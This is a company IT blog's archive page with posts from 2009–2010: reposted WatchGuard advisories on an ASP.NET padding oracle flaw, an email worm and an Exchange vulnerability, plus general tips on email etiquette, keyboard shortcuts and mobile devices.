Out-of-Cycle Bulletin Fixes Serious ASP.NET Padding Oracle Vulnerability

Comments Off Written on September 29th, 2010 by
Categories: Blog, Security, Servers
Tags: ,

Excerpted from Watchguard LiveSecurity Bulletin:


28 September, 2010


This vulnerability affects: All current versions of Microsoft’s .NET Framework

How an attacker exploits it: By sending a large number of web requests containing cipher text (and interpreting error responses)

Impact: In the worst case, an attacker can gain enough information to read and/or tamper with encrypted data from your web server

What to do: Install the proper .NET Framework update immediately (Windows update will not immediately push this update, you should download it manually)


At a cryptography conference in 2002, a researcher introduced a cryptological “side-channel” attack called a padding oracle attack, which attackers can leverage to decrypt Cipher Block Chaining or CBC-mode encryption without knowing the encryption key. Without getting into too much technical detail, block ciphers, like CBC, require that all messages arrive with the exact same number of blocks (multiples of eight bytes). However, the plain text messages you encrypt come in varying lengths, which may not fit perfectly within those specifically-sized boundaries. As a result, cryptographic algorithms have to use padding to fill in the extra, unused portions of each block. In order to check whether or not an encrypted value is padded correctly or not, encryption mechanisms employ something called a padding oracle. The researcher from 2002 found that by sending multiple, incorrectly padded messages to a server, he could interpret the error messages returned by the padding oracle to eventually learn enough to decrypt the server’s encrypted content without knowing the encryption key. The researcher even released a tool called Padding Oracle Exploit Tool (POET), which you can use to leverage this class of vulnerability.

More recently, at the Ekoparty security conference in Argentina, two security researchers reported that Microsoft ASP.NET suffers from this classic padding oracle attack. More specifically, they found a universal padding oracle vulnerability that supposedly affects every ASP.NET web application. They claimed attackers can leverage this flaw to decrypt cookies, view states, form authentication tickets, membership passwords, user data, and anything else encrypted using the ASP.NET framework’s API. As a result of these researcher’s findings, Microsoft has decided to release an out-of-band security update to correct this issue.

According to Microsoft’s out-of-band security bulletin, the ASP.NET components that ship with the .NET Framework suffer from an information disclosure vulnerability due a padding oracle flaw like the one described above. By repeatedly sending web requests containing a cipher text to a vulnerable ASP.NET web server, an attacker could interpret the error messages returned by the web server to eventually gain enough information to read or tamper with encrypted data. This would allow the attacker to gain access to significant amounts of sensitive information from your web server, and in one example, attackers even demonstrated how this leak could be leveraged to attack and potentially gain full access to the server.

Researchers have already released tools and shared examples showing how you can leverage this vulnerability. Furthermore, Microsoft has also seen evidence of attackers leveraging this flaw in the wild. If you have a web server using the .NET Framework, we highly recommend you update it immediately.

For more technical detail about this flaw, check out the articles in the References section below.


Microsoft has released .NET Framework updates to fix this vulnerability. If you have web servers that use the .NET Framework, you should download, test and deploy the corresponding update immediately.

Email Worm Making Headlines

Comments Off Written on September 13th, 2010 by
Categories: Blog, Security
Tags: , ,

Excerpted from Watchguard LiveSecurity Bulletin:

“Here you have” Email contains fake and malicious PDF or WMV links

Severity: Medium

10 September, 2010

Virus/Worm Summary:

  • Subject lines to avoid: include “Here you have,” or “Just for you,” and “This is the Free Dowload (sic) Sex Movies, you can find it Here”
  • Malicious email attachment: contains supposed links to PDF or WMV files, which actually link to malicious .SCR files
  • Impact: Spreads via your email contacts and through network shares. Infects your computer with various malware, and potentially steals information
  • What to do: Make sure you are using updated antivirus software, and block .SCR files at your gateway (see below for details)

About the Virus:

Late yesterday, various antivirus (AV) vendors began receiving reports of a new mass-mailing email worm, generally called VBMania, which arrives with various subjects including, “Here you have.” Today, others in the press have jumped on the bandwagon and published many shrill reports [ 1 / 2 / 3 ] that describe this worm as an outbreak and suggest it has flooded inboxes worldwide. While we don’t doubt that attackers have aggressively seeded this malicious email using spamming techniques (and likely a botnet), we haven’t yet seen the worm in our own inbox. There are reports of it affecting some well known companies. However, it doesn’t seem to be as wide-spread as the big worms of the past (Nimba, etc). In fact, most antivirus (AV) companies still only rate this worm as only a medium risk. While you should make yourself, and your users, aware of this new worm, it doesn’t offer reason for panic.

What you can do

  • As always, remind your users never to open unexpected attachments or click on unexpected web links from any source. Inform them that most modern viruses falsify the “From” field and can appear to come from friends, co-workers, or other trusted parties.
  • Most major antivirus vendors already have signatures that detect this worm. Check with your vendor for the latest update. 

 - This alert was researched and written by Corey Nachreiner, CISSP

Additional Resources

If you currently do not have a robust security solution, you can learn more about STG’s network security solutions, including managed virus protection here:

Is your wireless network secure?

Comments Off Written on July 23rd, 2010 by
Categories: Blog, Networking, Security
Tags: , ,

Google’s Street View is back in the news. Back in May Google admitted that the technology it used to take images with its Street View cars may have inadvertently gathered private information from unsecured Wireless Networking (Wi-Fi) networks. An articlefrom PCWORLD stated that the nonprofit Consumer Watchdog claims to have “retraced some of the routes taken by Google’s Street View cars, and found that four residences of U.S. Congress members it checked had vulnerable networks, according to a BBC report. One of them was Congressman Henry Waxman, chairman of the Energy and Commerce Committee, which has jurisdiction over Internet issues.”

Read the rest of this entry »

Microsoft offers online backup for your phone

Comments Off Written on June 11th, 2009 by
Categories: Blog
Tags: ,

I’ve read that an estimated 12 million mobile devices are lost or stolen every year in the US. What would happen if you lost your mobile device? Would you just shrug your shoulders and be OK because you were wanting to get a new phone anyway? Or would you freak out because you now don’t know how to get in touch with anyone and don’t know where you have to be and don’t know how to get there? And those great pictures you took of your family that you had been meaning to download are now lost forever. Well, if you have a Windows Mobile Device, Microsoft has come to the rescue with a free online backup solution for your smart phone.

Read the rest of this entry »

Beware of Spoofing

Comments Off Written on April 14th, 2009 by
Categories: Blog, Security
Tags: ,

ABC News had a story about Caller ID spoofing on last night’s broadcast. It highlighted the technology that allows people to pay for a service that will enable the caller to choose the name and phone number the caller id will display – as well as alter the sound of the caller’s voice. The technology that allows for this to work is not new.Back in 2006 the House and Senate had hearings on the phenomenon but did not pass any legislation against the practice. According to ABC News, Florida is the only state in the US that has a law against Caller ID spoofing.

Read the rest of this entry »

E-mail Etiquette Tips

Comments Off Written on April 10th, 2009 by
Categories: Blog
Tags: ,

I write and receive dozens of emails a day. Emailing has become the preferred means of communication for many individuals and businesses. Since this method of communication is so prevalent in our lives, why not make the experience a bit more pleasant and follow a few email etiquette rules.These “rules” are not set in stone and you will not be whipped with a wet piece of spaghetti if you break them, but the recipient of your emails will really appreciate your efforts to stick to them.
1. Read and proof your email before you hit ‘send’. You will catch a lot of type-o’s and may often find mistakes that your spell checker did not catch (i.e. ‘there’ vs. ‘their’)
2. Use punctuation. Though email is less professional than a business letter – it is more professional than a text message. Please remember to use commas, apostrophes and periods. Not doing so may distort your meaning and makes it more difficult for the recipient to read.
3. TYPING IN ALL CAPS LOOKS LIKE YOU ARE SHOUTING TO THE READER. Though it may be more convenient not to have to hit that Shift key at the beginning of a sentence, make the extra effort to only use capital letters when appropriate: formal names, states, countries… and many mail programs will automatically capitalize the 1st letter of a sentence for you (even on smart phones).
4. Be careful when you are trying to convey sarcasm or irony in your email. It’s difficult to pull off sarcasm without the context of facial expressions and the tone of your voice. You don’t want your email to offend or spark some conflict because you meant to be ironic and the reader thought you were being serious.

April 1st Virus fears are over-inflated

Comments Off Written on March 27th, 2009 by
Categories: Blog, Security
Tags: , ,

All week I have had questions from people regarding the news they heard about a virus attack that was set to go off on April 1st. Well, to me, it has become a very wide spread April Fool’s joke.  And I am not the only one that thinks so. There are several large security companies out there that agree.

Read the rest of this entry »

Featured Article: Advances in Mobility

Comments Off Written on March 11th, 2009 by
Categories: Blog, Mobility

Remember the days when you had to go to an office to work?

Not anymore!

The world seems to be the workplace for more and more people as advancements in mobility, computing power and security change the way we do business. But could it really be true that one day a majority of people will do everything from paying bills, researching information, updating their status, planning a night on the town, monitoring their children and responding to emails from a mobile device that oh, by the way, can also be used as a phone?

Read the rest of this entry »

Use keyboard shortcuts to save time

Comments Off Written on February 27th, 2009 by
Categories: Blog

Everyone is always looking for helpful tips to make their computing easier and quicker. Here’s one for you… shortcut keys! These are universal keyboard combinations and can be used in your Windows environment throughout most (if not all) applications installed on your PC. Here’s a list of keyboard combinations that should help speed things up for you… try them out and I think you’ll see that you’ll like using them.

Cut – CTRL + X
Copy – CTRL + C
Paste – CTRL + V
Undo – CTRL + Z
Bold – CTRL + B
Italic – CTRL + I
Underline – CTRL + U
Select All – CTRL + A
Print – CTRL + P
Save – CTRL + S

Security Update: Exchange

Comments Off Written on February 10th, 2009 by
Categories: Blog, Security
Tags: ,

Maliciously Crafted Email Can Pwn Your Exchange Server
Severity: High
10 February, 2009

This vulnerability affects: All current versions of Exchange Server

How an attacker exploits it: By sending a specially crafted email (no user interaction necessary)

Impact: An attacker can potentially gain control of your Exchange Server

What to do: Deploy the appropriate Exchange Server patch immediately

Exposure: Microsoft Exchange is one of the most popular email servers used today.

Read the rest of this entry »